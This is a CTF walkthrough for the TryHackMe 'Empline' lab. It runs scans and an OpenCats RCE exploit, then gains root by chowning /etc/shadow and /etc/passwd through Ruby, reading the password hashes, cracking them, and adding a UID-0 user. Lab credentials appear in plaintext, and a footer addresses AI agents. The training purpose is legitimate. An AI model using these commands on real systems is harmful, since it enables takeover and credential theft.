# Empline

**Room Link:** <https://tryhackme.com/room/empline>

### **Scans** <a href="#scans" id="scans"></a>

Initial scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/Svje3eKAWXFjV4swt52h" alt=""><figcaption></figcaption></figure>

Longer scan

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/ctSDFzdiukt8M4pDwrP5" alt=""><figcaption></figcaption></figure>

## **TCP/80 - HTTP**

**Kali**

```
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l
```

<figure><img src="/files/EUYsPmcMdHXh8op1dj8z" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/s1XTqMVF5kJR8flP0NPz" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/CJjXWnlEwubWjK6QqXC8" alt=""><figcaption></figcaption></figure>

**Kali**

```
echo "$VICTIM job.empline.thm" >> /etc/hosts
```

<figure><img src="/files/Ya7TXYaoIu8xVDN6JWvS" alt=""><figcaption></figcaption></figure>

## Initial Shell

OpenCats 0.9.4 has a RCE exploit.

Exploit: <https://www.exploit-db.com/raw/50585>

**Kali**

```
chmod +x exploit.sh 
./exploit.sh 
./exploit.sh http://job.empline.thm/
```

<figure><img src="/files/fDERRKpcdyaq1ix1vss1" alt=""><figcaption></figcaption></figure>

**Victim**

```
getcap -r / 2>/dev/null
```

<figure><img src="/files/ZKwJ3AxES8mWvAnAMZH1" alt=""><figcaption></figcaption></figure>

**Victim**

```
ls -lah /etc/shadow
ruby -e 'require "fileutils"; FileUtils.chown("www-data", "www-data", "/etc/shadow")'
ls -lah /etc/shadow
```

<figure><img src="/files/OqFEXyRAvLOADBlDyBgv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HR2KbVXRD6r2XTXbZq6j" alt=""><figcaption></figcaption></figure>

**Victim**

Now that we can read both f these files we can transfer them to Kali. I let this run for a while but it wasn't cracking any hashes.

```
cat /etc/passwd
cat /etc/shadow
```

**Kali**

```
unshadow passwd shadow > passwords.txt
```

**Kali**

```
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
```

I went back to the check the box and found the database credentials&#x20;

**Victim**

```
find / -name "config.php"
cat /var/www/opencats/config.php 
```

<figure><img src="/files/ntYBd33xBYCJHO2Lopsr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/i2lk2ruV9Rp5o9IKVils" alt=""><figcaption></figcaption></figure>

**Kali**

```
mysql -h $VICTIM -u james -png6pUFvsGNtw  
```

**Kali(mysql)**

```
show databases;
use opencats
show tables;  
select * from user;  
```

There were a few hashes from users so I put them in crackstation and one returned a result.

<figure><img src="/files/EJI6KRJje0Fr7uXgru8U" alt=""><figcaption></figcaption></figure>

## **TCP/22 - SSH**

**Kali**

```
ssh george@$VICTIM
Password: pretonnevippasempre
```

## Privilege Escalation

Since I had access to change any file already I just added a new root user to passwd

**Victim**

```
ruby -e 'require "fileutils"; FileUtils.chown("george", "george", "/etc/passwd")'
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
su new
Password: 123
```

<figure><img src="/files/SCQxTGEquq7P6X1GrebP" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/empline.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.